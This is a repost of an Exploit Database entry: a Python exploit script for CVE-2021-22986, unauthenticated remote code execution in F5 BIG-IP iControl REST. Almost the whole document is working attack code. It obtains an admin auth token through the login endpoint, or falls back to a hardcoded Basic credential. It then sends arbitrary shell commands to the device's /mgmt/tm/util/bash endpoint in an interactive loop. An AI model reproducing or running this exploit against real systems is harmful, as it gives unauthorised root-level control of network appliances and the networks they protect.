F5 BIG-IP 16.0.x – iControl REST Remote Code Execution (Unauthenticated)

Exploit Database
238 阅读

作者： Al1ex

日期： 2021-04-02
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/49738/

# Exploit Title: F5 BIG-IP 16.0.x - iControl REST Remote Code Execution (Unauthenticated)

# Exploit Author: Al1ex

# Vendor Homepage: https://www.f5.com/products/big-ip-services

# Version: 16.0.x before 16.0.1.1, 15.1.x before 15.1.2.1, 14.1.x before 14.1.4, 13.1.x before 13.1.3.6, and 12.1.x before 12.1.5.3 amd BIG-IQ 7.1.0.x before 7.1.0.3 and 7.0.0.x before 7.0.0.2

# CVE : CVE-2021-22986

import requests

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

import sys

def title():

print('''

______ _______________ ___ ______________ ___ _____

/|\ \/ / | ____| |__ \ / _ \|__ \/_ ||__ \|__ \ / _ \ / _ \/ /

|,----' \ \/ /||________ ) | | | | |) || |______ ) |) | | (_) | | (_) |/ /_

|| \/ | __||______/ /| | | | / / | | |______/ // / \__, |> _ <| '_ \

|`----. \/||____ / /_| |_| |/ /_ | | / /_ / /_ / /| (_) | | (_) |

\______|\__/ |_______| |____|\___/|____||_||____| |____| /_/\___/ \___/

Author:Al1ex@Heptagram

Github:https://github.com/Al1ex

''')

def exploit(url):

target_url = url + '/mgmt/shared/authn/login'

data = {

"bigipAuthCookie":"",

"username":"admin",

"loginReference":{"link":"/shared/gossip"},

"userReference":{"link":"https://localhost/mgmt/shared/authz/users/admin"}

}

headers = {

"User-Agent": "hello-world",

"Content-Type":"application/x-www-form-urlencoded"

}

response = requests.post(target_url, headers=headers, json=data, verify=False, timeout=15)

if "/mgmt/shared/authz/tokens/" not in response.text:

print('(-) Get token fail !!!')

print('(*) Tested Method 2:')

header_2 = {

'User-Agent': 'hello-world',

'Content-Type': 'application/json',

'X-F5-Auth-Token': '',

'Authorization': 'Basic YWRtaW46QVNhc1M='

}

data_2 = {

"command": "run",

"utilCmdArgs": "-c whoami"

}

check_url = url + '/mgmt/tm/util/bash'

try:

response2 = requests.post(url=check_url, json=data_2, headers=header_2, verify=False, timeout=20)

if response2.status_code == 200 and 'commandResult' in response2.text:

while True:

cmd = input("(:CMD)> ")

data_3 = {"command": "run", "utilCmdArgs": "-c '%s'"%(cmd)}

r = requests.post(url=check_url, json=data_3, headers=header_2, verify=False)

if r.status_code == 200 and 'commandResult' in r.text:

print(r.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))

else:

print('(-) Not vuln...')

exit(0)

except Exception:

print('ERROR Connect')

print('(+) Extract token: %s'%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0]))

while True:

cmd = input("(:CMD)> ")

headers = {

"Content-Type": "application/json",

"X-F5-Auth-Token": "%s"%(response.text.split('"selfLink":"https://localhost/mgmt/shared/authz/tokens/')[1].split('"}')[0])

}

data_json = {

"command": "run",

"utilCmdArgs": "-c \'%s\'"%(cmd)

}

exp_url= url + '/mgmt/tm/util/bash'

exp_req = requests.post(exp_url, headers=headers, json=data_json, verify=False, timeout=15)

if exp_req.status_code == 200 and 'commandResult' in exp_req.text:

print(exp_req.text.split('commandResult":"')[1].split('"}')[0].replace('\\n', ''))

else:

print('(-) Not vuln...')

exit(0)

if __name__ == '__main__':

title()

if(len(sys.argv) < 2):

print('[+] USAGE: python3 %s https://<target_url>\n'%(sys.argv[0]))

exit(0)

else:

exploit(sys.argv[1])